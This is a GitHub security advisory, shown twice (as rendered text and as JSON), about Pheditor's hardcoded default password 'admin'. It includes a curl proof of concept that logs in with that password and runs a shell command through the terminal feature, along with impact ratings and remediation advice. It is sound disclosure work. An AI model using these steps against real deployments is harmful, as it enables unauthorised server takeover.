GHSA-P4H7-P9RJ-2PQ2
Vulnerability from github – Published: 2026-07-16 20:11 – Updated: 2026-07-16 20:11Summary
Pheditor ships with a hardcoded default password admin (SHA-512 hash stored at pheditor.php:11). There is no mechanism to force a password change on first login. Any deployment using the default credentials grants an attacker full access to the file editor, file upload, and terminal features, enabling arbitrary file read/write and remote code execution.
Details
Tested repository: https://github.com/pheditor/pheditor
Tested commit: e538f05b6faec99e5b23726bc9c17d6b57774297 (current HEAD on main)
Affected version: All versions of Pheditor
The password is hardcoded at pheditor.php:11:
define('PASSWORD', 'c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec');
This is the SHA-512 hash of the string admin:
echo -n 'admin' | sha512sum
c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec
The application displays a warning banner at pheditor.php:1956-1958 when the default password is in use, but this is only visual — there is no forced password change, no expiry, no lockout, and no setup wizard. Many deployments run with the default indefinitely.
The password hash is stored as unsalted SHA-512 in the source code. The password change feature (lines 363-391) writes the new hash directly into the PHP source file, meaning anyone with read access to the source can extract it.
Combined impact: With the default password, an unauthenticated attacker can authenticate and exploit the terminal RCE and file upload vulnerabilities for immediate server compromise.
PoC
Environment: Any system running Pheditor with default configuration.
Setup:
git clone https://github.com/pheditor/pheditor /tmp/pheditor-test
cd /tmp/pheditor-test
php -S localhost:8080 pheditor.php &
Positive trigger — authenticate with default password:
curl -s -c /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \
-d "pheditor_password=admin" -L -o /dev/null -w "%{http_code}"
Expected: 200 — successful authentication with the default password admin.
Verify full access:
TOKEN=$(curl -s -b /tmp/cookies.txt http://localhost:8080/pheditor.php | \
grep -o 'token = "[a-f0-9]*"' | grep -o '"[a-f0-9]*"' | tr -d '"')
curl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \
--data-urlencode "action=terminal" \
--data-urlencode "token=$TOKEN" \
--data-urlencode 'command=echo `id`' \
--data-urlencode "dir="
Expected: id output showing web server user — proves full system access through default credentials combined with terminal RCE.
Control (wrong password):
curl -s -X POST http://localhost:8080/pheditor.php \
-d "pheditor_password=wrongpassword" | grep -o 'not correct'
Expected: not correct — authentication logic works but default password is trivially guessable.
Cleanup:
kill %1; rm -rf /tmp/pheditor-test /tmp/cookies.txt
Impact
Use of Hard-coded Credentials (CWE-798). The default password admin is publicly documented in the source code, trivially guessable, and there is no mechanism to force a password change on first login. This effectively grants unauthenticated remote attackers full administrator access to the application.
Attacker privileges: Unauthenticated remote attacker (PR:N).
Security boundary crossed: Unauthenticated → fully authenticated administrator.
Confidentiality impact: High — read all files within MAIN_DIR and beyond (via terminal).
Integrity impact: High — write/delete files, upload webshells, modify application code, execute arbitrary commands.
Availability impact: High — delete files and directories, disrupt services.
Suggested remediation:
1. Remove the default password — require user to set a password during installation.
2. Add a setup wizard that forces password creation on first access.
3. Add a forced password change on first login with default credentials.
4. Use password_hash() / password_verify() with PASSWORD_BCRYPT instead of raw SHA-512.
Credits
- Thai Son Dinh from VinSOC Labs (R&D)
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "pheditor/pheditor"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.1"
},
{
"fixed": "2.0.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-55579"
],
"database_specific": {
"cwe_ids": [
"CWE-798"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-16T20:11:23Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "### Summary\n\nPheditor ships with a hardcoded default password `admin` (SHA-512 hash stored at `pheditor.php:11`). There is no mechanism to force a password change on first login. Any deployment using the default credentials grants an attacker full access to the file editor, file upload, and terminal features, enabling arbitrary file read/write and remote code execution.\n\n### Details\n\nTested repository: https://github.com/pheditor/pheditor\n\nTested commit: `e538f05b6faec99e5b23726bc9c17d6b57774297` (current HEAD on `main`)\n\nAffected version: All versions of Pheditor\n\nThe password is hardcoded at `pheditor.php:11`:\n\n```php\ndefine(\u0027PASSWORD\u0027, \u0027c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec\u0027);\n```\n\nThis is the SHA-512 hash of the string `admin`:\n```bash\necho -n \u0027admin\u0027 | sha512sum\nc7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec\n```\n\nThe application displays a warning banner at `pheditor.php:1956-1958` when the default password is in use, but this is only visual \u2014 there is no forced password change, no expiry, no lockout, and no setup wizard. Many deployments run with the default indefinitely.\n\nThe password hash is stored as unsalted SHA-512 in the source code. The password change feature (lines 363-391) writes the new hash directly into the PHP source file, meaning anyone with read access to the source can extract it.\n\n**Combined impact:** With the default password, an unauthenticated attacker can authenticate and exploit the terminal RCE and file upload vulnerabilities for immediate server compromise.\n\n### PoC\n\n**Environment:** Any system running Pheditor with default configuration.\n\n**Setup:**\n```bash\ngit clone https://github.com/pheditor/pheditor /tmp/pheditor-test\ncd /tmp/pheditor-test\nphp -S localhost:8080 pheditor.php \u0026\n```\n\n**Positive trigger \u2014 authenticate with default password:**\n```bash\ncurl -s -c /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \\\n -d \"pheditor_password=admin\" -L -o /dev/null -w \"%{http_code}\"\n```\nExpected: `200` \u2014 successful authentication with the default password `admin`.\n\n**Verify full access:**\n```bash\nTOKEN=$(curl -s -b /tmp/cookies.txt http://localhost:8080/pheditor.php | \\\n grep -o \u0027token = \"[a-f0-9]*\"\u0027 | grep -o \u0027\"[a-f0-9]*\"\u0027 | tr -d \u0027\"\u0027)\ncurl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \\\n --data-urlencode \"action=terminal\" \\\n --data-urlencode \"token=$TOKEN\" \\\n --data-urlencode \u0027command=echo `id`\u0027 \\\n --data-urlencode \"dir=\"\n```\nExpected: `id` output showing web server user \u2014 proves full system access through default credentials combined with terminal RCE.\n\n**Control (wrong password):**\n```bash\ncurl -s -X POST http://localhost:8080/pheditor.php \\\n -d \"pheditor_password=wrongpassword\" | grep -o \u0027not correct\u0027\n```\nExpected: `not correct` \u2014 authentication logic works but default password is trivially guessable.\n\n**Cleanup:**\n```bash\nkill %1; rm -rf /tmp/pheditor-test /tmp/cookies.txt\n```\n\n### Impact\n\nUse of Hard-coded Credentials (CWE-798). The default password `admin` is publicly documented in the source code, trivially guessable, and there is no mechanism to force a password change on first login. This effectively grants unauthenticated remote attackers full administrator access to the application.\n\n**Attacker privileges:** Unauthenticated remote attacker (PR:N).\n\n**Security boundary crossed:** Unauthenticated \u2192 fully authenticated administrator.\n\n**Confidentiality impact:** High \u2014 read all files within MAIN_DIR and beyond (via terminal).\n\n**Integrity impact:** High \u2014 write/delete files, upload webshells, modify application code, execute arbitrary commands.\n\n**Availability impact:** High \u2014 delete files and directories, disrupt services.\n\n**Suggested remediation:**\n1. Remove the default password \u2014 require user to set a password during installation.\n2. Add a setup wizard that forces password creation on first access.\n3. Add a forced password change on first login with default credentials.\n4. Use `password_hash()` / `password_verify()` with `PASSWORD_BCRYPT` instead of raw SHA-512.\n\n### Credits\n- Thai Son Dinh from VinSOC Labs (R\u0026D)",
"id": "GHSA-p4h7-p9rj-2pq2",
"modified": "2026-07-16T20:11:23Z",
"published": "2026-07-16T20:11:23Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pheditor/pheditor/security/advisories/GHSA-p4h7-p9rj-2pq2"
},
{
"type": "PACKAGE",
"url": "https://github.com/pheditor/pheditor"
},
{
"type": "WEB",
"url": "https://github.com/pheditor/pheditor/releases/tag/2.0.6"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Pheditor: Hardcoded default password \u0027admin\u0027 with no forced change enables full application compromise"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.